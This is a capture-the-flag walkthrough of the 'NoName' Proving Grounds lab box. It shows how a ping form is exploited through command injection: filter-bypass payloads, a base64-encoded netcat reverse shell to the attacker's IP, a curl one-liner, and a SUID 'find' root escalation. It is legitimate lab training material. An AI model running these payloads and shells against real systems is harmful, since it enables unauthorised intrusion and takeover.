NoName OffSec Walkthrough: NoName OffSec Walkthrough is Intermediate Level Box Design by OffSec. Its Available on OffSec Play Proving Ground.
Table of contents
NoName may appear easy, but not everything is always straightforward. Only local.txt and proof.txt are valid flags.
Footprinting
Open ports
Nmap SYN scan:
kali@kali:~$ sudo nmap -sS -p- -Pn -v10 -oA syn_full 192.168.207.15
Discovered open port 80/tcp on 192.168.207.15
NSE scan:
kali@kali:~$ sudo nmap -sC -sV -p80 -Pn -v10 -oA nse 192.168.207.15
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
HTTP
In the main web page, there is a form which requires an IP:
>>>
POST /index.php HTTP/1.1
Host: 192.168.207.15
box=fake+query&submitt=submit
<<<
<h4>Fake Admin Area</h4>
<form action="index.php" method="post">
<input type="text" placeholder="fake query" name="box">
<input type="submit" placeholder="Run" value="submit" name="submitt">
</form>
Fake ping executed
However, that is a fake query box, as the IP input is not processed. Enumeration using ffuf reveals an admin directory:
kali@kali:~$ ffuf -v -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.207.15/FUZZ -t 50 -fc 404,403 -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
"http://192.168.207.15/
"http://192.168.207.15/"
"http://192.168.207.15/."
"http://192.168.207.15/admin"
"http://192.168.207.15/index.php"
This resource contains 4 images, with no sensitive information:
kali@kali:~$ wget -r http://192.168.207.15/admin
kali@kali:~$ ls ./192.168.207.15
ctf-01.jpg haclabs.jpeg new.jpg Short.png
kali@kali:~$ exiftool ./192.168.207.15/*
Steganographic message
Looking closer at that admin page, a password is hidden at the very bottom response !
>>>
GET /admin HTTP/1.1
Host: 192.168.207.15
<<<
<html>
<body style="background-color:Gainsboro;text-align:center">
<h3 text-align:center>HacLabs directory of gallery.</h3>
<img src="new.jpg" height="200" width="200">
<br>
<img src="ctf-01.jpg" height="200" width="200">
<br>
<img src="haclabs.jpeg" height="200" width="200">
<br>
<img src="Short.png" height="200" width="200">
</body>
</html>
[...]
<!--passphrase:harder-->
But what I can do with that passphrase ? Is there any hidden file in one of the images ?
kali@kali:~$ steghide extract -sf haclabs.jpeg
Enter passphrase:
wrote extracted data to "imp.txt".
Yup !
kali@kali:~$ cat imp.txt
c3VwZXJhZG1pbi5waHA=
kali@kali:~$ base64 -d imp.txt
superadmin.php
This superadmin.php contains a ping feature (which is real this time!):
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=127.0.0.1&submitt=Submit+Query
<<<
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.015 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.029 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.027 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2030ms
rtt min/avg/max/mdev = 0.015/0.023/0.029/0.008 ms
OS Command Injection
This output is the same as in a standard shell:
kali@kali:~$ ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.013 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.060 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2036ms
rtt min/avg/max/mdev = 0.013/0.037/0.060/0.019 ms
I immediately found a blind command injection using the pipe symbol:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=|sleep+10&submitt=Submit+Query
<<<
[10,452millis]
Note that the injection doesn’t need to be blind, as the output is returned in the response:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=|id&submitt=Submit+Query
<<<
uid=33(www-data) gid=33(www-data) groups=33(www-data)
See the query form in index.php was a rabbit hole, as the user’s input isn’t processed:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0acat+index.php&submitt=Submit+Query
<<<
<?php
if (isset($_POST['submitt']))
{
echo "Fake ping executed";
}
?>
But we can’t reverse shell as easily, as some characters are filtered, such as nc, or & (URL-encoded %26):
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0asleep+2%26&submitt=Submit+Query
<<<
[14millis]
Note that a Line Feed (\n URL-encoded %0a) can also be used to inject the next command.
Here, the injected command was not executed as the response came in less than 2 seconds (i.e. 0.014s). In fact, the source code shows that the filtered patterns are inarray(";", "&&", "/", "bin", "&", " &&", "ls", "nc", "dir", "pwd"):
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0acat+superadmin.php&submitt=Submit+Query
<<<
<?php
if (isset($_POST['submitt']))
{
$word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
$pinged=$_POST['pinger'];
$newStr = str_replace($word, "", $pinged);
if(strcmp($pinged, $newStr) == 0)
{
$flag=1;
}
else
{
$flag=0;
}
}
if ($flag==1){
$outer=shell_exec("ping -c 3 $pinged");
echo "<pre>$outer</pre>";
}
?>
Having a reverse shell with nc seems tougher than it sounds, but some bypasses exist !
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0al\s%0a&submitt=Submit+Query
<<<
Short.png
admin
ctf-01.jpg
haclabs.jpeg
index.php
new.jpg
superadmin.php
Indeed, nc could be obfuscated as n\c, and bypass the filter:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0ash|n\c++192.168.49.207+48590&submitt=Submit+Query
<<<
$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38142
Arf ! No command is being executed…
$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38144
id
ls
whoami
echo plz
After lots of trials and errors, I realized the following payload worked:
$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.207 48590 >/tmp/f' |base64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu
NDkuMjA3IDQ4NTkwID4vdG1wL2YK
Note that the base64-encoded command contains a new line, which should be URL-encoded to %0a:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query
<<<
$ nc -nlvp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38194
sh: 0: can't access tty; job control turned off
$ whoami
www-data
A one-liner reverse shell could be:
$ curl -X POST -d "pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query" http://192.168.207.15/superadmin.php
Local privilege escalation
local.txt
The users are:
$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
haclabs:x:1000:1000:haclabs,,,:/home/haclabs:/bin/bash
yash:x:1001:1001:,,,:/home/yash:/bin/bash
The first flag is in yash‘s directory:
$ cd /home/yash
$ ls
flag1.txt
local.txt
$ cat *
Due to some security issues,I have saved haclabs password in a hidden file.
95[...]e6
proof.txt
Let’s search, given the above sentence, the haclabs‘s password:
Due to some security issues,I have saved haclabs password in a hidden file.
Well, nothing interesting in his folder:
$ cd /home/haclabs
$ ls -la
total 80
drwxr-xr-x 16 haclabs haclabs 4096 Mar 16 2020 .
drwxr-xr-x 4 root root 4096 Jan 27 2020 ..
-rw------- 1 haclabs haclabs 2576 Jan 30 2020 .ICEauthority
-rw-r--r-- 1 root root 0 Mar 16 2020 .bash_history
-rw-r--r-- 1 haclabs haclabs 3771 Jan 27 2020 .bashrc
drwx------ 13 haclabs haclabs 4096 Feb 9 2020 .cache
drwx------ 11 haclabs haclabs 4096 Jan 27 2020 .config
drwx------ 3 haclabs haclabs 4096 Jan 27 2020 .gnupg
drwx------ 3 haclabs haclabs 4096 Jan 27 2020 .local
drwx------ 5 haclabs haclabs 4096 Jan 27 2020 .mozilla
-rw-r--r-- 1 haclabs haclabs 807 Jan 27 2020 .profile
drwx------ 2 haclabs haclabs 4096 Jan 27 2020 .ssh
-rw-r--r-- 1 haclabs haclabs 0 Jan 27 2020 .sudo_as_admin_successful
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Desktop
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Documents
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Downloads
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Music
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Pictures
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Public
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Templates
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Videos
-rw-r--r-- 1 root root 152 Jan 30 2020 flag2.txt
Is there anything interesting inflag2.txt ?
$ cat flag2.txt
I am flag2
--------------- ----------------
--------
Nope :/ Using linpeas, I realized searching for haclabs‘s password was a rabbit hole. Indeed, I forgot to look for root SUIDs !CopyCopy
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 233K Nov 5 2017 /usr/bin/find
Exploiting that find command, here we get the root flag:
$ find . -exec /bin/sh -p \; -quit
$ id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
$ ls /root
flag3.txt
proof.txt
$ cat /root/*
Your flag is in another file...
41[...]51Finally this lab Solve see you on next lab;)
Also Read | SoSimple OffSec Walkthrough
